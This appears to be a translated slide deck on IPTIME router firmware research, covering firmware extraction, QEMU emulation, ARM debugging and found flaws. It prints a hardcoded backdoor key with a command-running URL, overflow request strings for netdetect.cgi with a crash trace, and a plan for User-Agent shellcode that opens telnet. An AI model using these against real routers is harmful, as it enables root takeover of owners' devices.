mount initrd ./FILE_SYSTEM      (add -o loop if your mount does not set up the loop device automatically)
Extracting the initrd
root@ip-172-31-4-170:~/mongii/iptime# cd FILE_SYSTEM/
root@ip-172-31-4-170:~/mongii/iptime/FILE_SYSTEM# ls -al
total 26
drwxr-xr-x 12 root root  1024 Apr 12  2011 .
drwxr-xr-x  3 root root  4096 Jun 25 15:22 ..
lrwxrwxrwx  1 root root    11 Apr 12  2011 bin -> /cramfs/bin
drwxr-xr-x  2  510  504  1024 Apr 12  2011 cramfs
drwxr-xr-x  3  510  504  1024 Apr 12  2011 dev
drwxr-xr-x  5  510  504  1024 Apr 12  2011 etc
drwxr-xr-x  3  510  504  1024 Apr 12  2011 home
lrwxrwxrwx  1 root root    11 Apr 12  2011 lib -> /cramfs/lib
drwx------  2 root root 12288 Apr 12  2011 lost+found
lrwxrwxrwx  1 root root    13 Apr 12  2011 ndbin -> /cramfs/ndbin
drwxr-xr-x  2  510  504  1024 Apr 12  2011 proc
drwxr-xr-x  2  510  504  1024 Apr 12  2011 save
lrwxrwxrwx  1 root root    12 Apr 12  2011 sbin -> /cramfs/sbin
drwxr-xr-x  2  510  504  1024 Apr 12  2011 tmp
drwxr-xr-x  2  510  504  1024 Apr 12  2011 upgrade-bin
lrwxrwxrwx  1 root root    11 Apr 12  2011 usr -> /cramfs/usr
drwxr-xr-x  5  510  504  1024 Apr 12  2011 var
root@ip-172-31-4-170:~/mongii/iptime/FILE_SYSTEM#
bin, sbin, lib, usr and ndbin are symlinks into /cramfs, which is empty here: that is the mount point the squashfs is mounted on at boot, so the initrd alone is not the whole root file system.
Re-checking the binwalk output: the root file system is the Squashfs at 720896 (0xB0000).
Extraction
root@ip-172-31-4-170:~/mongii/iptime# dd skip=720896 if=./g104_kr_7_60.bin of=./RFS.bin bs=1
1204416+0 records in
1204416+0 records out
1204416 bytes (1.2 MB) copied, 1.33462 s, 902 kB/s
root@ubuntu:~/iptime_firmware# file RFS.bin
RFS.bin: Squashfs filesystem, little endian, version 3.0, 1201395 bytes, 243 inodes, blocksize: 65536 bytes, created: Tue Apr 12 07:55:31 2011
root@ubuntu:~/iptime_firmware# ls -al RFS.bin
-rw-r--r-- 1 root root 1204416 Jun 25 15:24 RFS.bin
root@ubuntu:~/iptime_firmware#
(The carved file is 1204416 bytes while the superblock says 1201395: the difference is padding at the end of the image.)
Firmware-mod-kit: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/firmware-mod-kit/fmk_099.tar.gz
Installing FMK
# apt-get install git build-essential zlib1g-dev liblzma-dev python-magic
tar xvfz fmk_099.tar.gz
cd fmk/src
./configure
make
cd ..
Extracting the squashfs
root@ip-172-31-4-170:~/mongii/fmk/fmk# ./unsquashfs_all.sh RFS.bin    (or B0000.squashfs from binwalk -e)
Attempting to extract SquashFS.X file system...
Trying ./src/squashfs-2.1-r2/unsquashfs-lzma...
Trying ./src/squashfs-2.1-r2/unsquashfs...
Trying ./src/squashfs-3.0/unsquashfs-lzma...
created 173 files
created 17 directories
created 53 symlinks
created 0 devices
created 0 fifos
File system sucessfully extracted!
MKFS="./src/squashfs-3.0/mksquashfs-lzma"
root@ip-172-31-4-170:~/mongii/fmk/fmk#
(The script tries several unsquashfs builds in turn; the one that succeeds, squashfs-3.0 with LZMA, tells you which mksquashfs to use when repacking.)
Result of the file system extraction
root@ip-172-31-4-170:~/mongii/fmk/fmk# cd squashfs-root/
root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root# ls -al
total 40
drwxr-xr-x 10 root   root   4096 Apr 12  2011 .
drwxrwxr-x  5 ubuntu ubuntu 4096 Jun 25 15:28 ..
drwxr-xr-x  3  510    504   4096 Apr 12  2011 bin
drwxr-xr-x  2  510    504   4096 Apr 12  2011 help
drwxr-xr-x  2 root   root   4096 Apr 12  2011 images2
drwxr-xr-x  2  510    504   4096 Apr 12  2011 js
drwxr-xr-x  3  510    504   4096 Apr 12  2011 lib
drwxr-xr-x  2  510    504   4096 Apr 12  2011 ndbin
drwxr-xr-x  2  510    504   4096 Apr 12  2011 sbin
drwxr-xr-x  4  510    504   4096 Apr 12  2011 usr
root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root#
Structure of the IPTIME firmware
- Bootloader (first 64 KB): decompresses the image that follows and references it
- i.tmp.gz: kernel (zImage) + initrd (ext2), which becomes /
- Squashfs: mounted at /cramfs/, where the initrd's bin, sbin, lib, usr and ndbin symlinks point
Together the initrd and the squashfs form the root file system.
Restoring the file system
Mount the initrd: mount initrd FILE_SYSTEM
Extract the squashfs: unsquashfs_all.sh B0000.squashfs
Merge the two:
  mkdir ALL_FILE_SYSTEM
  cd ALL_FILE_SYSTEM
  cp -Rfpd XXX/FILE_SYSTEM/* .
  cp -Rfpd YYY/squashfs-root/* ./cramfs/
(-d keeps the symlinks as symlinks; since they are absolute /cramfs/... paths they only resolve once this tree is the root, i.e. inside the QEMU guest or a chroot.)
Running it under QEMU (user mode: qemu-arm runs a single ARM binary on the x86 host, with -L pointing at the extracted tree so the dynamic loader and libraries are found there)
root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root/bin# qemu-arm -L ../ ./busybox
BusyBox v0.60.4 (2011.04.12-07:54+0000) multi-call binary

Usage: busybox [function] [arguments]...
   or: [function] [arguments]...

        BusyBox is a multi-call binary that combines many common Unix
        utilities into a single executable.  Most people will create a
        link to busybox for each function they wish to use, and BusyBox
        will act like whatever it was invoked as.

Currently defined functions:
        busybox, cat, chmod, cp, df, echo, gunzip, gzip, ifconfig, insmod,
        kill, lash, ln, ls, lsmod, mkdir, mknod, mount, mv, ps, reboot, rm,
        rmmod, route, sh, sync, umount, zcat

root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root/bin#
Running it under QEMU
root@ubuntu:~/iptime_firmware/squashfs-root/bin# qemu-arm -L ../ ./busybox ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:9A:54:2E
          inet addr:192.168.0.100  Bcast:192.168.0.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:469580 errors:0 dropped:0 overruns:0 frame:0
          TX packets:529023 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:82662221 (78.8 MiB)  TX bytes:170072676 (162.1 MiB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

root@ubuntu:~/iptime_firmware/squashfs-root/bin#
(User-mode QEMU forwards system calls to the host kernel, so this is the host's interface list, not the router's; the router's ARM busybox is what executed, which is the point of the test.)
Running it under QEMU
root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root/bin# qemu-arm -L ../ ./timepro.cgi
Content-type: text/html; charset=euc-kr

<html>
<script>
if( ipstr == '151.35583.255.199') {
    return document.getElementsByName(ip+4)[0];
}
return 0;
}
</script>
<head><title> </title>
<style></style></head>
</html>
root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root/bin#
Virtual IPTIME system
cd <path of the assembled IPTIME file system>
# find . | cpio -o --format=newc > ../rootfs.img
gzip -c ../rootfs.img > rootfs.img.gz
zImage: the zImage built in the earlier exercise (the zImage extracted from the IPTIME firmware was built for the router's board and does not run on versatilepb)
qemu-system-arm -M versatilepb -m 128M -kernel zImage -initrd rootfs.img.gz -append "root=/dev/ram rdinit=/bin/sh console=ttyAMA0,115200" -nographic
mount -t proc /proc /proc
ps -aux
Virtual IPTIME system (boot log)
Uncompressing Linux... done, booting the kernel.
Booting Linux on physical CPU 0x0
Linux version 4.1.6 (root@ubuntu) (gcc version 4.4.1 (Sourcery G++ Lite 2009q3-67) ) #1 Thu Aug 20 17:46:08 KST 2015
CPU: ARM926EJ-S [41069265] revision 5 (ARMv5TEJ), cr=00093177
CPU: VIVT data cache, VIVT instruction cache
Machine: ARM-Versatile PB
Memory policy: Data cache writeback
sched_clock: 32 bits at 24MHz, resolution 41ns, wraps every 89478484971ns
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 32512
Kernel command line: root=/dev/ram rdinit=/bin/sh console=ttyAMA0,115200
PID hash table entries: 512 (order: -1, 2048 bytes)
Dentry cache hash table entries: 16384 (order: 4, 65536 bytes)
Inode-cache hash table entries: 8192 (order: 3, 32768 bytes)
Memory: 121596K/131072K available (3209K kernel code, 139K rwdata, 796K rodata, 120K init, 119K bss, 9476K reserved, 0K cma-reserved)
Virtual kernel memory layout:
    vector  : 0xffff0000 - 0xffff1000   (   4 kB)
    fixmap  : 0xffc00000 - 0xfff00000   (3072 kB)
    vmalloc : 0xc8800000 - 0xff000000   ( 872 MB)
    lowmem  : 0xc0000000 - 0xc8000000   ( 128 MB)
    modules : 0xbf000000 - 0xc0000000   (  16 MB)
      .text : 0xc0008000 - 0xc03f1944   (4007 kB)
      .init : 0xc03f2000 - 0xc0410000   ( 120 kB)
      .data : 0xc0410000 - 0xc0432e00   ( 140 kB)
       .bss : 0xc0432e00 - 0xc0450d04   ( 120 kB)
NR_IRQS:224
...
BusyBox v0.60.4 (2015.08.11-09:18+0000) Built-in shell (lash)
Enter 'help' for a list of built-in commands.

input: AT Raw Set 2 keyboard as /devices/fpga:06/serio0/input/input0
/ # input: ImExPS/2 Generic Explorer Mouse as /devices/fpga:07/serio1/input/input2
/ #
Enabling the network
root@grayhash:~/all_file_system# qemu-system-arm -M versatilepb -m 128M -kernel zImage -initrd rootfs.img.gz -append "root=/dev/ram rdinit=/bin/sh console=ttyAMA0,115200" -nographic -redir tcp:8080::80
/ # busybox ifconfig eth0 10.0.2.15 netmask 255.255.255.0
smc91x smc91x.0 eth0: link up
/ # busybox route add default gw 10.0.2.2
/ # cd /sbin
/cramfs/sbin # ./httpd
/cramfs/sbin #
(-redir forwards host port 8080 to port 80 in the guest. Newer QEMU releases removed -redir; the equivalent is -net nic -net user,hostfwd=tcp::8080-:80.)
Connecting to the admin page (http://localhost:8080/ on the host)
Router vulnerability detection strategy
Attack vectors of a wired/wireless router
- The router admin page, e.g. http://192.168.0.1: web hacking (e.g. shell command execution), CGI hacking (e.g. memory corruption)
- The router's remote services: e.g. dhcpd, web server, FTP server, SNMP, VPN
Vulnerability detection strategy: map the directory layout; identify everything that takes user input; analyse it for the main vulnerability classes (logic flaws, buffer overflows, format strings); debug; exploit!
Directory structure
/ # ls -al
lrwxrwxrwx    1 0     0           11 usr -> /cramfs/usr
lrwxrwxrwx    1 0     0           13 ndbin -> /cramfs/ndbin
lrwxrwxrwx    1 0     0           11 bin -> /cramfs/bin
lrwxrwxrwx    1 0     0           12 sbin -> /cramfs/sbin
lrwxrwxrwx    1 0     0           11 lib -> /cramfs/lib
drwxr-xr-x    7 510   504       1024 var
drwxr-xr-x    2 510   504       1024 upgrade-bin
drwxr-xr-x    1 0     0            0 tmp
drwxr-xr-x    2 0     0         1024 save
dr-xr-xr-x   32 0     0            0 proc
drwxr-xr-x    3 510   504       1024 home
drwxr-xr-x    5 510   504       1024 etc
drwxr-xr-x    3 510   504       1024 dev
drwxr-xr-x   10 0     0           83 cramfs
drwxr-xr-x   11 0     0         1024 ..
drwxr-xr-x   11 0     0         1024 .
/ #
Boot process analysis
/etc/init.d/rcS
#!/bin/sh
mount -t proc /proc /proc
echo 1 >> /proc/sys/net/ipv4/ip_forward
/sbin/inittime
/sbin/inittime: diagnoses the router's state, performs the router's initialisation, and starts the various services.
Process list
/var # ps
  PID TTY Uid   Size State Command
    1     root   768 S   init
    2     root     0 S   [keventd]
    3     root     0 S   [ksoftirqd_CPU0]
    4     root     0 S   [kswapd]
    5     root     0 S   [bdflush]
    6     root     0 S   [kupdated]
    7     root     0 S   [mtdblockd]
   30     root     0 S   [polling]
  103     root     0 D   [insmod]
  254     root   588 S   upnpd
  269     root   760 S   httpd
  271     root   564 S   /sbin/dhcpd
  276     root   496 S   /sbin/pptpd -b br0
  278     root   736 S   apcpd
  280     root   736 S   /sbin/iptables -q
  282     root   544 S   /sbin/dhclient -i eth1 -p dhclient.eth1
  700     root   492 R   ps
/var #
Two things to note: every service, httpd included, runs as root, so a bug in any CGI is root code execution; and the keventd/bdflush/kupdated threads mark this as a 2.4-series kernel.
/var # cat boa_vh.conf
Port 80
User root
Group root
ServerAdmin root@localhost
VirtualHost
DocumentRoot /home/httpd
UserDir public_html
DirectoryIndex index.html
KeepAliveMax 100
KeepAliveTimeout 10
MimeTypes /etc/mime.types
DefaultType text/plain
AddType application/x-httpd-cgi cgi
AddType text/html html
ScriptAlias /cgi-bin/ /bin/
ScriptAlias /testbin/ /tmp/
ScriptAlias /nd-bin/ /ndbin/
ScriptAlias /login/ /bin/login/
ScriptAlias /ddns/ /bin/ddns/
ServerName ""
SinglePostLimit 2097152
Auth /cgi-bin /etc/httpd.passwd
Auth /main /etc/httpd.passwd
/var #
Boa web server, configured in /var/boa_vh.conf. The ScriptAlias lines map URL prefixes onto directories of CGI binaries; the Auth lines cover /cgi-bin and /main only, so /nd-bin/ (netdetect.cgi) is not behind the admin password. Also note ScriptAlias /testbin/ /tmp/: it exposes the writable ramfs /tmp as a CGI directory, which is worth checking on a live device.
The web admin page
/home/httpd
/home/httpd # ls -al
-rw-r--r--    1 0     0           29 build_date
-rw-r--r--    1 0     0            5 version
-rw-r--r--    1 0     0            1 checkup
-rwxr-xr-x    1 510   504       2109 mypage_menu.html
-rwxr-xr-x    1 510   504        186 mypage.html
-rwxr-xr-x    1 510   504      13642 time.v2.css
lrwxrwxrwx    1 0     0           12 help -> /cramfs/help
lrwxrwxrwx    1 0     0           10 js -> /cramfs/js
lrwxrwxrwx    1 0     0           15 images2 -> /cramfs/images2
drwxr-xr-x    2 510   504       1024 192.168.0.1
-rwxr-xr-x    1 510   504       3536 time.css
drwxr-xr-x    2 510   504       1024 192.168.255.1
drwxr-xr-x    2 510   504       1024 192.168.255.250
-rwxr-xr-x    1 510   504        112 index.html
drwxr-xr-x    3 510   504       1024 ..
drwxr-xr-x    5 510   504       1024 .
/home/httpd #
/home/httpd
/home/httpd # cat index.html
<html>
<head>
<meta http-equiv=refresh content="0; URL=login/login.cgi">
<title></title>
<body>
</body>
</html>
/home/httpd #
The redirect target login/login.cgi resolves through the ScriptAlias /login/ /bin/login/ line in /var/boa_vh.conf.
IPTIME's CGIs
/cramfs/bin # ls -al *.cgi
-rwxr-xr-x    1 510   504      28600 wps_wizard.cgi
-rwxr-xr-x    1 510   504      14372 upgrade.cgi
-rwxr-xr-x    1 510   504     498128 timepro.cgi
lrwxrwxrwx    1 0     0           16 start.cgi -> /bin/command.cgi
lrwxrwxrwx    1 0     0           16 d.cgi -> /bin/timepro.cgi
-rwxr-xr-x    1 510   504      16444 ated.cgi
/cramfs/bin # ls -al login/login.cgi
-rwxr-xr-x    1 510   504      23428 login/login.cgi
/ # ls -al /ndbin/*.cgi
lrwxrwxrwx    1 0     0           16 /ndbin/netdetect.cgi -> /bin/timepro.cgi
* 5 distinct CGI binaries in total (wps_wizard, upgrade, timepro, ated, login); d.cgi and netdetect.cgi are symlinks to timepro.cgi, by far the largest of them.
Vulnerability hunting (static analysis): start from main (the entry point) and trace forward; hunt by cross-references to dangerous functions: strcpy, strcat, sprintf, system, execl, getenv.
Vulnerability hunting (dynamic analysis): trace the calls to dangerous functions at run time with ltrace, strace and gdb. Use a shell on the virtual OS, or on the device via the backdoor or UART. Cross compile these tools and upload them to the device.
Why ARM debugging is needed: finding vulnerabilities; finding the address the shellcode landed at; working out why an exploit failed. Tools: gdb, strace and ltrace built for ARM.
Cross compile test
root@grayhash:~# cat main.c
int main()
{
	printf("hello world\n");
}
root@grayhash:~# arm-none-linux-gnueabi-gcc -o main main.c -static
main.c: In function 'main':
main.c:4:2: warning: incompatible implicit declaration of built-in function 'printf' [enabled by default]
  printf("hello world\n");
  ^
root@grayhash:~# file main
main: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.16, not stripped
root@grayhash:~#
(-static matters: the router's libc is an old uClibc-era build, so a dynamically linked binary from the host toolchain would not find its libraries there.)
Cross compile test: rebuild the root file system with the new binary inside and boot it
# rm rootfs.img.gz zImage
# find . | cpio -o --format=newc > ../rootfs.img
# gzip -c ../rootfs.img > rootfs.img.gz
# cp /root/zImage .
# qemu-system-arm -M versatilepb -m 128M -kernel zImage -initrd rootfs.img.gz -append "root=/dev/ram rdinit=/bin/sh console=ttyAMA0,115200" -nographic -redir tcp:8080::80
BusyBox v0.60.4 (2011.04.12-07:54+0000) Built-in shell (lash)
Enter 'help' for a list of built-in commands.

/ # input: ImExPS/2 Generic Explorer Mouse as /devices/fpga:07/serio1/input/input2
/ # ./main
hello world
/ #
Compiling strace
https://sourceforge.net/projects/strace/files/strace/4.8/
export CC=/root/MentorGraphics/Sourcery_CodeBench_Lite_for_ARM_GNU_Linux/bin/arm-none-linux-gnueabi-gcc
export STRIP=/root/MentorGraphics/Sourcery_CodeBench_Lite_for_ARM_GNU_Linux/bin/arm-none-linux-gnueabi-strip
./configure --host=arm-linux CFLAGS=-static
make
Rebuild the file system with the binary included.
Usage: ./strace -i -f -p 285    (285 being httpd's PID)
Monitoring process execution: strace -i -f -p PID -e trace=execve
Compiling gdb and gdbserver
wget https://ftp.gnu.org/gnu/gdb/gdb-6.8a.tar.gz
An older gcc is needed: https://uclibc.org/downloads/binaries/0.9.30/cross-compiler-armv4l.tar.bz2
export CC=/root/cross-compiler-armv4l/bin/armv4l-gcc
export STRIP=/root/cross-compiler-armv4l/bin/armv4l-strip
ln -s /root/cross-compiler-armv4l/bin/armv4l-ar /bin/arm-linux-ar
apt install texinfo
Build termcap-1.3.1 first (https://ftp.gnu.org/gnu/termcap/termcap-1.3.1.tar.gz): ./configure --host=arm-linux; make; then cp libtermcap.a /root/
vi ./gdb-6.8/gdb/configure and add at line 6289: ac_cv_search_tgetent="/root/libtermcap.a"
Inside the gdb-6.8 directory: ./configure --host=arm-linux CFLAGS=-static
make
Compiling ltrace
http://pkgs.fedoraproject.org/repo/pkgs/ltrace/ltrace-0.7.2.tar.bz2/f5d9282b471cdf9fbafd916ec5be0717/
export CC=/root/cross-compiler-armv4l/bin/armv4l-gcc
export STRIP=/root/cross-compiler-armv4l/bin/armv4l-strip
Install libelf: http://www.mr511.de/software/libelf-0.8.13.tar.gz
./configure --host=arm-linux
make
* Compilation throws many errors; using Buildroot (next page) is recommended.
Using Buildroot
Buildroot: an integrated tool that builds a complete root file system (toolchain included).
http://buildroot.uclibc.org/downloads/buildroot-2013.08.1.tar.gz
tar xvfz buildroot-2013.08.1.tar.gz
make ARCH=arm menuconfig
  Target architecture => ARM (little endian)
  Target packages => Debugging => strace, ltrace
  Save => exit
make    (no ARCH or CROSS_COMPILE options; Buildroot builds its own toolchain)
Downloading files onto the device: needed to get tools onto the embedded device.
Not present: wget, nc, scp, ftp, rz. Present: /sbin/http
/sbin/http get http://ip/gdb > gdb
임베디드기기의용량문제 /var/run # df Filesystem 1k-blocks Used Available Use% Mounted on rootfs 443 120 298 29% / /dev/root 443 120 298 29% / /dev/cramfs 1216 1216 0 100% /cramfs /dev/ram1 219 2 205 1% /save /var/run # IPTIME G104 의경우, 바이너리의용량은대략 300kb 이하여야한다. 새로운바이너리를올리기에부족한용량.
Escaping the size limit!
/ # mount
rootfs on / type rootfs (rw)
/dev/root on / type ext2 (rw)
/dev/cramfs on /cramfs type squashfs (ro)
proc on /proc type proc (rw)
ramfs on /tmp type ramfs (rw)
/dev/ram1 on /save type ext2 (rw)
/ #
RAMFS => the remaining free RAM can be used as a file system.
/ # cat /proc/meminfo
MemTotal: 14720 kb
MemFree: 6796 kb
/ #
Vulnerabilities found!
Remote-management backdoor
Remote buffer overflow in netdetect.cgi
Various others.. smtp command injection, httpd, apcpd
Analysis of the remote-management backdoor
Remote-management backdoor (old)
Became an issue in 2007 (http://kldp.org/node/83510).
Could run internal commands and read files.
A page apparently created for convenience during debugging and development (?)
Remote-management backdoor (new)
A password (key) was added; it can be recovered by reverse engineering.
A setting value was added.
If both conditions are satisfied, the page is still accessible.
Remote-management backdoor (new) [timepro.cgi]
The Key : aaksjdkfj=#notenoughmineral^
Remote-management backdoor (new)
Enabling the remote-management function:
/etc # echo remote_support=1 >> /etc/iconfig.cfg
http://192.168.0.1/cgibin/d.cgi?act=1&fname=&cmd=ls&aaksjdkfj=%23notenoughmineral%5e&dapply=+Show+
Buffer overflow vulnerability analysis
Remote Buffer Overflow: Timepro.cgi == Netdetect.cgi (symbolic link)
Netdetect.cgi (accessible without the admin password)
URL parameter handling
Strcpy!!
Remote Buffer Overflow
http://192.168.0.1/ndbin/netdetect.cgi?commit=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
or
http://192.168.0.1/ndbin/netdetect.cgi?flag=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
or
Content-Type = AAAAAAAAAAAAAAAAAAAAAAAAAAAA x1100
Remote Buffer Overflow
/cramfs/ndbin # /strace -i /cramfs/ndbin/netdetect.cgi commit=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
) = 171
[b6f9eed0] write(1, "\n", 1) = 1
[b6f9eed0] write(1, "\n", 1) = 1
[b6f9ee9c] read(3, "noline_box { padding:0px 0px 0px"..., 256) = 74
[b6f9eed0] write(1, ".noline_box { padding:0px 0px 0p"..., 75.noline_box { padding:0px 0px 0px 0px; border-style:none none none none; }
) = 75
[b6f9ee9c] read(3, "", 256) = 0
[b6f9ef38] close(3) = 0
[b6f9eed0] write(1, "</style></head>\n", 16</style></head>
) = 16
[b6f9ef04] open("/var/run/icv_check", O_RDONLY) = -1 ENOENT (No such file or directory)
[b6f9eed0] write(1, "</html>\n", 8</html>
) = 8
[42424242] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
[????????] +++ killed by SIGSEGV +++
/cramfs/ndbin #
Buffer overflow vulnerability
http://<target IP>/nd-bin/netdetect.cgi?commit=AAAAAAAAAAAAAAAA~

Stack memory
BEFORE STRCPY():  [ Buffer                       ] [ R11  ] [ SP   ] [ LR     ]
AFTER STRCPY():   [ aaaaaaaaaaaaaaaaaaaaaaaaaaaa ] [ aaaa ] [ aaaa ] [ aaaa   ]  <- saved LR (PC) overwritten

Where to put the shellcode?
Check the protections: ASLR (X), DEP (X)
Shellcode can execute on both the stack and the heap.
Stack dump
Final target: the HTTP User-Agent header

Buffer overflow vulnerability
[ aaaaaaaaaaaaaaaaaaaaaaaaaaaa | aaaa | aaaa | aaaa ] = Buffer | R11 | SP | LR(PC)
Where should the shellcode be placed?
The CGI stores HTTP data in environment variables.
User-Agent: shellcode that starts utelnetd and allows telnet in iptables
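The defect the slides show is a query-string value copied into a fixed-size stack buffer with strcpy(), which lets a long commit=, flag= or Content-Type value overwrite the saved r11 and lr. The following is an added example, not code from the slides or from the IPTIME firmware: it places the unsafe pattern next to a bounded parser that rejects over-long values instead of copying them. PARAM_MAX, get_query_param, handle_commit_safe and the sample query strings are assumptions for illustration; the real netdetect.cgi frame layout is not given on the page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for illustration; netdetect.cgi's real frame layout is
 * not given on the slides. */
#define PARAM_MAX 32

/* The pattern the slides describe: a query-string value is copied into a
 * fixed-size stack buffer with strcpy(). Any value longer than the buffer
 * runs past it into the saved r11 and lr that the prologue pushed. */
static void handle_commit_unsafe(const char *value)
{
    char buf[PARAM_MAX];
    strcpy(buf, value);            /* no length check: the defect */
    printf("commit=%s\n", buf);
}

/* Hardened form: find "name=value" in a query string and copy the value
 * into out, refusing values that would not fit (rejecting rather than
 * silently truncating, so later code never sees a mangled value).
 * Returns 0 on success, -1 if the parameter is absent, -2 if too long. */
int get_query_param(const char *query, const char *name,
                    char *out, size_t out_len)
{
    size_t name_len = strlen(name);
    const char *p = query;

    while (p != NULL && *p != '\0') {
        const char *end = strchr(p, '&');
        size_t pair_len = end ? (size_t)(end - p) : strlen(p);

        if (pair_len > name_len && strncmp(p, name, name_len) == 0
            && p[name_len] == '=') {
            const char *val = p + name_len + 1;
            size_t val_len = pair_len - name_len - 1;
            if (val_len >= out_len)
                return -2;         /* would overflow: refuse the request */
            memcpy(out, val, val_len);
            out[val_len] = '\0';
            return 0;
        }
        p = end ? end + 1 : NULL;
    }
    return -1;
}

/* Safe replacement for the handler: bounded copy, explicit rejection. */
int handle_commit_safe(const char *query)
{
    char buf[PARAM_MAX];
    int rc = get_query_param(query, "commit", buf, sizeof buf);
    if (rc == 0)
        printf("commit=%s\n", buf);
    else if (rc == -2)
        printf("commit value too long, request rejected\n");
    return rc;
}

int main(void)
{
    /* Constructed inputs: a normal value and one long enough to overrun PARAM_MAX. */
    const char *ok = "flag=1&commit=ok";
    const char *oversized =
        "commit=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

    handle_commit_unsafe("ok");     /* in-bounds only; a longer value would corrupt the stack */
    handle_commit_safe(ok);         /* returns 0 */
    handle_commit_safe(oversized);  /* returns -2, nothing copied */
    return 0;
}
```

The same bounded lookup applies to every value the CGI copies, including the flag= parameter and the Content-Type header the slides also list; the important design choice is to return an error for anything that does not fit, since truncating the value would hide the fault instead of reporting it.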
ARM Exploitation
ARM assembly
Function calls, argument passing, local stack allocation, stack push/pop, base pointer, passing and restoring the return address, shellcode analysis
ARM assembly
#include <stdio.h>

int my_func(int a, int b, int c)
{
    int sum;
    sum = a+b+c;
    return sum;
}

void main()
{
    int ret;
    ret = my_func(1, 2, 3);
    printf("sum = %d\n", ret);
}
Register list
(gdb) b *main
Breakpoint 1 at 0x83e0
(gdb) r
Starting program: /root/test
Breakpoint 1, 0x000083e0 in main ()
Current language: auto; currently asm
(gdb) info reg
r0             0x1          1
r1             0xbefefe34   3204382260
r2             0xbefefe3c   3204382268
r3             0x0          0
r4             0x8408       33800
r5             0x0          0
r6             0x82d0       33488
r7             0x0          0
r8             0x0          0
r9             0x0          0
r10            0x40025000   1073893376
r11            0x0          0
r12            0x83e0       33760
sp             0xbefefdac   0xbefefdac
lr             0x4003c06c   1073987692
pc             0x83e0       0x83e0 <main>
fps            0x1001000    16781312
cpsr           0x60000010   1610612752
(gdb)
Argument passing / function call / local stack allocation / stack push/pop / base pointer
(the same disassembly of main, annotated with the instruction each topic refers to)
(gdb) disass main
Dump of assembler code for function main:
   0x00008474 <+0>:  push {r11, lr}                        // stack push: lr is pushed first
   0x00008478 <+4>:  add r11, sp, #4                       // base pointer
   0x0000847c <+8>:  sub sp, sp, #8                        // local stack allocation
   0x00008480 <+12>: mov r0, #1                            // argument passing: a in r0
   0x00008484 <+16>: mov r1, #2                            //                   b in r1
   0x00008488 <+20>: mov r2, #3                            //                   c in r2
   0x0000848c <+24>: bl 0x8430 <my_func>                   // function call
   0x00008490 <+28>: str r0, [r11, #-8]                    // return value (r0) -> ret
   0x00008494 <+32>: ldr r3, [pc, #16] ; 0x84ac <main+56>
   0x00008498 <+36>: mov r0, r3
   0x0000849c <+40>: ldr r1, [r11, #-8]
   0x000084a0 <+44>: bl 0x837c <printf>
   0x000084a4 <+48>: sub sp, r11, #4
   0x000084a8 <+52>: pop {r11, pc}                         // stack pop: saved lr goes into pc
End of assembler dump.
(gdb)
Child function
(gdb) disass my_func
Dump of assembler code for function my_func:
   0x00008430 <+0>:  push {r11} ; (str r11, [sp, #-4]!)
   0x00008434 <+4>:  add r11, sp, #0
   0x00008438 <+8>:  sub sp, sp, #28
   0x0000843c <+12>: str r0, [r11, #-16]
   0x00008440 <+16>: str r1, [r11, #-20]
   0x00008444 <+20>: str r2, [r11, #-24]
   0x00008448 <+24>: ldr r2, [r11, #-16]
   0x0000844c <+28>: ldr r3, [r11, #-20]
   0x00008450 <+32>: add r2, r2, r3
   0x00008454 <+36>: ldr r3, [r11, #-24]
   0x00008458 <+40>: add r3, r2, r3
   0x0000845c <+44>: str r3, [r11, #-8]
   0x00008460 <+48>: ldr r3, [r11, #-8]
   0x00008464 <+52>: mov r0, r3
   0x00008468 <+56>: add sp, r11, #0
   0x0000846c <+60>: pop {r11} ; (ldr r11, [sp], #4)
   0x00008470 <+64>: bx lr                                 // lr = Link Register
End of assembler dump.
(gdb)
bx vs bl
b : branch, jump by a relative address
bx : branch and exchange, absolute jump to the address held in a register
bl : branch with link, jump by offset + store the return address in lr
blx : branch with link and exchange, jump to a register + store the return address in lr

str and ldr
ldr (load): read a value from a given address into a register. Example: ldr r2, [r11, #-16] (direction: memory -> register)
str (store): write a register's value to a given address. Example: str r0, [r11, #-16] (direction: register -> memory)
ARM buffer overflow attack method
Because ARM returns from a function through the lr register, the attack differs somewhat from a classic stack buffer overflow (that is, RET is not stored on the stack!).
[Cases where an attack is possible]
1. When lr is saved on the stack: a function that calls a child function saves its current lr on the stack.
2. When another function's stack frame can also be overwritten.
Most cases fall under 1, because the vulnerability arises while calling a child function such as strcpy.
Example 1 (lr is not saved)
int my_func(int a, int b, int c)
{
